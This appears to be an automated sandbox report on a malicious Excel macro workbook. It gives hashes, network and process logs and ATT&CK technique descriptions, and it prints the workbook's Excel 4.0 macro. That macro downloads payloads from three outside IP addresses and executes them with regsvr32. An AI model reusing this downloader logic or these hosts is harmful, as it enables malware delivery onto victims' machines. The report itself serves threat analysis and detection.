Preview:	..Mn.0....z...B..EP...H.e. ....Xb.?.Lb.C.Q...,..X..y.Gi8.Y.].a...]T.V..N.....g...1......1..../...XP..5kS..G..X9..V...H.34.XB..r2....6.)k......U..nE.o..e.....x...DF.... .[,.@..!... c....\|PD....5.......8..*;c.U>~............S.29...MF....%.x..~....J.w..s..anN...W.u.EV....Y.k.5P......2..rq.......N:.....F...T..\...hL..6.c(.#.D.5.....d..i.1......[.(...........!..g.\|....B.\.Z...9.^.....Cp>...p...i..KOB...~...]=.N..;.\|\|I.;.;.g........PK..........!...&n....o.......[Content_Types].xml ...(........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Desktop\~$Permission-40776837-06252021.xlsm Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	330
Entropy (8bit):	1.6081032063576088
Encrypted:	false
SSDEEP:	3:RFXI6dtBhFXI6dtt:RJZhJ1
MD5:	836727206447D2C6B98C973E058460C9
SHA1:	D83351CF6DE78FEDE0142DE5434F9217C4F285D2
SHA-256:	D9BECB14EECC877F0FA39B6B6F856365CADF730B64E7FA2163965D181CC5EB41
SHA-512:	7F843EDD7DC6230BF0E05BF988D25AE6188F8B22808F2C990A1E8039C0CECC25D1D101E0FDD952722FEAD538F7C7C14EEF9FD7F4B31036C3E7F79DE570CD0607
Malicious:	true
Reputation:	high, very likely benign file
Preview:	.pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

Static File Info

General
File type:	Microsoft Excel 2007+
Entropy (8bit):	7.666398010242972
TrID:	Excel Microsoft Office Open XML Format document (40004/1) 83.33% ZIP compressed archive (8000/1) 16.67%
File name:	Permission-40776837-06252021.xlsm
File size:	153750
MD5:	2cd2fd004b5589a595239f202ac648ae
SHA1:	ac02da8a953fd89f325c64bf5df93e415350ec12
SHA256:	ad3071800cd6852215e7ffcc6c65e7104e3d6e10bccfffc8249d73be0512d6dd
SHA512:	6cac4bb0573617012f4dbfe93fec4c18c824be4b452407a09af5b46d88326e24d828b5a4eea9b762c687a1fd6b98de8235ff9bad418313a00d9e6e36c38ffe8a
SSDEEP:	3072:QmKZQmKZ3KNhPQnVbJ2O1gZMys2g4D5JhoD4ZOYJ:P4P4346PgZw9gQaVJ
File Content Preview:	PK..........!.........o.......[Content_Types].xml ...(.........................................................................................................................................................................................................

File Icon


Icon Hash:	74ecd0e2f696908c

Static OLE Info

General
Document Type:	OpenXML
Number of OLE Files:	1

OLE File "Permission-40776837-06252021.xlsm"

Indicators
Has Summary Info:
Application Name:
Encrypted Document:
Contains Word Document Stream:
Contains Workbook/Book Stream:
Contains PowerPoint Document Stream:
Contains Visio Document Stream:
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros:

Macro 4.0 Code

,=NOW()&H8,.dat,,,,,,,"=REGISTER(Sheet2!O12,Sheet2!O13,Sheet2!O14,Sheet2!O15,,1,9)","=""http://185.240.103.219/""","=Jerutyg(0,F13&G8,""..\Kro.fis"",0,0)","=""http://190.14.37.3/""","=Jerutyg(0,F14&G8,""..\Kro.fis1"",0,0)","=""http://185.183.99.120/""","=Jerutyg(0,F15&G8,""..\Kro.fis2"",0,0)",,,,,,,,,,,,,,,,,,,,=RUN(Sheet4!I9),

=EXEC(Sheet2!O22)"=EXEC(Sheet2!O22&""1"")""=EXEC(Sheet2!O22&""2"")"=HALT()

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
06/25/21-18:43:10.505432	ICMP	399	ICMP Destination Unreachable Host Unreachable			186.148.101.114	192.168.2.22
06/25/21-18:43:13.515728	ICMP	399	ICMP Destination Unreachable Host Unreachable			186.148.101.114	192.168.2.22
06/25/21-18:43:19.735650	ICMP	399	ICMP Destination Unreachable Host Unreachable			186.148.101.114	192.168.2.22
06/25/21-18:43:32.155929	ICMP	399	ICMP Destination Unreachable Host Unreachable			186.148.101.114	192.168.2.22
06/25/21-18:43:35.295940	ICMP	399	ICMP Destination Unreachable Host Unreachable			186.148.101.114	192.168.2.22
06/25/21-18:43:41.478686	ICMP	399	ICMP Destination Unreachable Host Unreachable			186.148.101.114	192.168.2.22
06/25/21-18:43:52.235681	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49169	185.183.99.120	192.168.2.22

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 25, 2021 18:50:35.329961061 CEST	49710	80	192.168.2.3	185.240.103.219
Jun 25, 2021 18:50:35.419142962 CEST	80	49710	185.240.103.219	192.168.2.3
Jun 25, 2021 18:50:35.955828905 CEST	49710	80	192.168.2.3	185.240.103.219
Jun 25, 2021 18:50:36.044797897 CEST	80	49710	185.240.103.219	192.168.2.3
Jun 25, 2021 18:50:36.729530096 CEST	49710	80	192.168.2.3	185.240.103.219
Jun 25, 2021 18:50:36.818770885 CEST	80	49710	185.240.103.219	192.168.2.3
Jun 25, 2021 18:50:36.831753016 CEST	49713	80	192.168.2.3	190.14.37.3
Jun 25, 2021 18:50:39.839215994 CEST	49713	80	192.168.2.3	190.14.37.3
Jun 25, 2021 18:50:45.839742899 CEST	49713	80	192.168.2.3	190.14.37.3
Jun 25, 2021 18:50:57.903893948 CEST	49729	80	192.168.2.3	185.183.99.120
Jun 25, 2021 18:50:57.971148014 CEST	80	49729	185.183.99.120	192.168.2.3
Jun 25, 2021 18:50:57.971276999 CEST	49729	80	192.168.2.3	185.183.99.120
Jun 25, 2021 18:50:57.973424911 CEST	49729	80	192.168.2.3	185.183.99.120
Jun 25, 2021 18:50:58.038516045 CEST	80	49729	185.183.99.120	192.168.2.3
Jun 25, 2021 18:50:58.294532061 CEST	80	49729	185.183.99.120	192.168.2.3
Jun 25, 2021 18:50:58.294696093 CEST	49729	80	192.168.2.3	185.183.99.120
Jun 25, 2021 18:52:03.298073053 CEST	80	49729	185.183.99.120	192.168.2.3
Jun 25, 2021 18:52:03.298263073 CEST	49729	80	192.168.2.3	185.183.99.120
Jun 25, 2021 18:52:22.020569086 CEST	49729	80	192.168.2.3	185.183.99.120
Jun 25, 2021 18:52:22.084696054 CEST	80	49729	185.183.99.120	192.168.2.3

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 25, 2021 18:50:19.810643911 CEST	51281	53	192.168.2.3	8.8.8.8
Jun 25, 2021 18:50:19.879683971 CEST	53	51281	8.8.8.8	192.168.2.3
Jun 25, 2021 18:50:20.256871939 CEST	49199	53	192.168.2.3	8.8.8.8
Jun 25, 2021 18:50:20.313234091 CEST	53	49199	8.8.8.8	192.168.2.3
Jun 25, 2021 18:50:20.750936031 CEST	50620	53	192.168.2.3	8.8.8.8
Jun 25, 2021 18:50:20.810126066 CEST	53	50620	8.8.8.8	192.168.2.3
Jun 25, 2021 18:50:22.241734982 CEST	64938	53	192.168.2.3	8.8.8.8
Jun 25, 2021 18:50:22.294462919 CEST	53	64938	8.8.8.8	192.168.2.3
Jun 25, 2021 18:50:23.674243927 CEST	60152	53	192.168.2.3	8.8.8.8
Jun 25, 2021 18:50:23.732770920 CEST	53	60152	8.8.8.8	192.168.2.3
Jun 25, 2021 18:50:24.743762970 CEST	57544	53	192.168.2.3	8.8.8.8
Jun 25, 2021 18:50:24.800446987 CEST	53	57544	8.8.8.8	192.168.2.3
Jun 25, 2021 18:50:28.828699112 CEST	55984	53	192.168.2.3	8.8.8.8
Jun 25, 2021 18:50:28.883744955 CEST	53	55984	8.8.8.8	192.168.2.3
Jun 25, 2021 18:50:31.043193102 CEST	64185	53	192.168.2.3	8.8.8.8
Jun 25, 2021 18:50:31.089494944 CEST	53	64185	8.8.8.8	192.168.2.3
Jun 25, 2021 18:50:32.037458897 CEST	65110	53	192.168.2.3	8.8.8.8
Jun 25, 2021 18:50:32.147217989 CEST	53	65110	8.8.8.8	192.168.2.3
Jun 25, 2021 18:50:32.582799911 CEST	58361	53	192.168.2.3	8.8.8.8
Jun 25, 2021 18:50:32.657250881 CEST	53	58361	8.8.8.8	192.168.2.3
Jun 25, 2021 18:50:33.619904041 CEST	58361	53	192.168.2.3	8.8.8.8
Jun 25, 2021 18:50:33.692002058 CEST	53	58361	8.8.8.8	192.168.2.3
Jun 25, 2021 18:50:34.666982889 CEST	58361	53	192.168.2.3	8.8.8.8
Jun 25, 2021 18:50:34.726264000 CEST	53	58361	8.8.8.8	192.168.2.3
Jun 25, 2021 18:50:35.354074955 CEST	63492	53	192.168.2.3	8.8.8.8
Jun 25, 2021 18:50:35.411569118 CEST	53	63492	8.8.8.8	192.168.2.3
Jun 25, 2021 18:50:36.259536982 CEST	60831	53	192.168.2.3	8.8.8.8
Jun 25, 2021 18:50:36.316579103 CEST	53	60831	8.8.8.8	192.168.2.3
Jun 25, 2021 18:50:36.667165995 CEST	58361	53	192.168.2.3	8.8.8.8
Jun 25, 2021 18:50:36.727368116 CEST	53	58361	8.8.8.8	192.168.2.3
Jun 25, 2021 18:50:37.393304110 CEST	60100	53	192.168.2.3	8.8.8.8
Jun 25, 2021 18:50:37.448817015 CEST	53	60100	8.8.8.8	192.168.2.3
Jun 25, 2021 18:50:38.257772923 CEST	53195	53	192.168.2.3	8.8.8.8
Jun 25, 2021 18:50:38.303987980 CEST	53	53195	8.8.8.8	192.168.2.3
Jun 25, 2021 18:50:39.123522997 CEST	50141	53	192.168.2.3	8.8.8.8
Jun 25, 2021 18:50:39.174053907 CEST	53	50141	8.8.8.8	192.168.2.3
Jun 25, 2021 18:50:39.911742926 CEST	53023	53	192.168.2.3	8.8.8.8
Jun 25, 2021 18:50:39.958201885 CEST	53	53023	8.8.8.8	192.168.2.3
Jun 25, 2021 18:50:40.795144081 CEST	58361	53	192.168.2.3	8.8.8.8
Jun 25, 2021 18:50:40.846277952 CEST	53	58361	8.8.8.8	192.168.2.3
Jun 25, 2021 18:50:41.082525969 CEST	49563	53	192.168.2.3	8.8.8.8
Jun 25, 2021 18:50:41.150320053 CEST	53	49563	8.8.8.8	192.168.2.3
Jun 25, 2021 18:50:43.069267035 CEST	51352	53	192.168.2.3	8.8.8.8
Jun 25, 2021 18:50:43.126393080 CEST	53	51352	8.8.8.8	192.168.2.3
Jun 25, 2021 18:50:44.159279108 CEST	59349	53	192.168.2.3	8.8.8.8
Jun 25, 2021 18:50:44.217035055 CEST	53	59349	8.8.8.8	192.168.2.3
Jun 25, 2021 18:50:44.955938101 CEST	57084	53	192.168.2.3	8.8.8.8
Jun 25, 2021 18:50:45.008265018 CEST	53	57084	8.8.8.8	192.168.2.3
Jun 25, 2021 18:50:45.894210100 CEST	58823	53	192.168.2.3	8.8.8.8
Jun 25, 2021 18:50:45.942765951 CEST	53	58823	8.8.8.8	192.168.2.3
Jun 25, 2021 18:50:46.643114090 CEST	57568	53	192.168.2.3	8.8.8.8
Jun 25, 2021 18:50:46.693327904 CEST	53	57568	8.8.8.8	192.168.2.3
Jun 25, 2021 18:50:53.070477962 CEST	50540	53	192.168.2.3	8.8.8.8
Jun 25, 2021 18:50:53.134277105 CEST	53	50540	8.8.8.8	192.168.2.3
Jun 25, 2021 18:50:58.203706026 CEST	54366	53	192.168.2.3	8.8.8.8
Jun 25, 2021 18:50:58.269130945 CEST	53	54366	8.8.8.8	192.168.2.3
Jun 25, 2021 18:51:09.994662046 CEST	53034	53	192.168.2.3	8.8.8.8
Jun 25, 2021 18:51:10.066056967 CEST	53	53034	8.8.8.8	192.168.2.3
Jun 25, 2021 18:51:13.379555941 CEST	57762	53	192.168.2.3	8.8.8.8
Jun 25, 2021 18:51:13.550486088 CEST	53	57762	8.8.8.8	192.168.2.3
Jun 25, 2021 18:51:14.448649883 CEST	55435	53	192.168.2.3	8.8.8.8
Jun 25, 2021 18:51:14.507313013 CEST	53	55435	8.8.8.8	192.168.2.3
Jun 25, 2021 18:51:16.205517054 CEST	50713	53	192.168.2.3	8.8.8.8
Jun 25, 2021 18:51:16.265022993 CEST	53	50713	8.8.8.8	192.168.2.3
Jun 25, 2021 18:51:16.273585081 CEST	56132	53	192.168.2.3	8.8.8.8
Jun 25, 2021 18:51:16.419866085 CEST	53	56132	8.8.8.8	192.168.2.3
Jun 25, 2021 18:51:16.862550974 CEST	58987	53	192.168.2.3	8.8.8.8
Jun 25, 2021 18:51:16.918747902 CEST	53	58987	8.8.8.8	192.168.2.3
Jun 25, 2021 18:51:17.853729963 CEST	56579	53	192.168.2.3	8.8.8.8
Jun 25, 2021 18:51:17.917100906 CEST	53	56579	8.8.8.8	192.168.2.3
Jun 25, 2021 18:51:18.765666008 CEST	60633	53	192.168.2.3	8.8.8.8
Jun 25, 2021 18:51:18.826708078 CEST	53	60633	8.8.8.8	192.168.2.3
Jun 25, 2021 18:51:19.273528099 CEST	61292	53	192.168.2.3	8.8.8.8
Jun 25, 2021 18:51:19.335311890 CEST	53	61292	8.8.8.8	192.168.2.3
Jun 25, 2021 18:51:20.186266899 CEST	63619	53	192.168.2.3	8.8.8.8
Jun 25, 2021 18:51:20.243901014 CEST	53	63619	8.8.8.8	192.168.2.3
Jun 25, 2021 18:51:21.175168037 CEST	64938	53	192.168.2.3	8.8.8.8
Jun 25, 2021 18:51:21.233876944 CEST	53	64938	8.8.8.8	192.168.2.3
Jun 25, 2021 18:51:21.705694914 CEST	61946	53	192.168.2.3	8.8.8.8
Jun 25, 2021 18:51:21.764916897 CEST	53	61946	8.8.8.8	192.168.2.3
Jun 25, 2021 18:51:28.676196098 CEST	64910	53	192.168.2.3	8.8.8.8
Jun 25, 2021 18:51:28.733829975 CEST	53	64910	8.8.8.8	192.168.2.3
Jun 25, 2021 18:51:31.207365990 CEST	52123	53	192.168.2.3	8.8.8.8
Jun 25, 2021 18:51:31.272627115 CEST	53	52123	8.8.8.8	192.168.2.3
Jun 25, 2021 18:51:39.135790110 CEST	56130	53	192.168.2.3	8.8.8.8
Jun 25, 2021 18:51:39.194905996 CEST	53	56130	8.8.8.8	192.168.2.3
Jun 25, 2021 18:52:03.888739109 CEST	56338	53	192.168.2.3	8.8.8.8
Jun 25, 2021 18:52:03.958210945 CEST	53	56338	8.8.8.8	192.168.2.3
Jun 25, 2021 18:52:05.454044104 CEST	59420	53	192.168.2.3	8.8.8.8
Jun 25, 2021 18:52:05.531568050 CEST	53	59420	8.8.8.8	192.168.2.3

HTTP Request Dependency Graph

185.183.99.120

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49729	185.183.99.120	80	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Timestamp	kBytes transferred	Direction	Data
Jun 25, 2021 18:50:57.973424911 CEST	1450	OUT	GET /44372.78513125.dat HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: 185.183.99.120 Connection: Keep-Alive
Jun 25, 2021 18:50:58.294532061 CEST	1452	IN	HTTP/1.1 403 Forbidden Server: nginx Date: Fri, 25 Jun 2021 16:51:13 GMT Content-Type: text/html Content-Length: 548 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: EXCEL.EXE PID: 3508 Parent PID: 792

General

Start time:	18:50:30
Start date:	25/06/2021
Path:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
Imagebase:	0x9c0000
File size:	27110184 bytes
MD5 hash:	5D6638F2C8F8571C593999C58866007E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: regsvr32.exe PID: 3120 Parent PID: 3508

General

Start time:	18:50:58
Start date:	25/06/2021
Path:	C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):	true
Commandline:	regsvr32 ..\Kro.fis
Imagebase:	0x12e0000
File size:	20992 bytes
MD5 hash:	426E7499F6A7346F0410DEAD0805586B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: regsvr32.exe PID: 4640 Parent PID: 3508

General

Start time:	18:50:59
Start date:	25/06/2021
Path:	C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):	true
Commandline:	regsvr32 ..\Kro.fis1
Imagebase:	0x12e0000
File size:	20992 bytes
MD5 hash:	426E7499F6A7346F0410DEAD0805586B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: regsvr32.exe PID: 4688 Parent PID: 3508

General

Start time:	18:50:59
Start date:	25/06/2021
Path:	C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):	true
Commandline:	regsvr32 ..\Kro.fis2
Imagebase:	0x12e0000
File size:	20992 bytes
MD5 hash:	426E7499F6A7346F0410DEAD0805586B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report Permission-40776837-06252021.xlsm

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Overview

Sigma Overview

System Summary:

Signature Overview

Compliance:

Software Vulnerabilities:

Networking:

System Summary:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static OLE Info

General

OLE File "Permission-40776837-06252021.xlsm"

Indicators

Macro 4.0 Code

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

HTTP Request Dependency Graph

HTTP Packets

Code Manipulations

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back

Behavior

System Behavior

Analysis Process: EXCEL.EXE PID: 3508 Parent PID: 792

General

Chronological Activities

Analysis Process: regsvr32.exe PID: 3120 Parent PID: 3508

General

Chronological Activities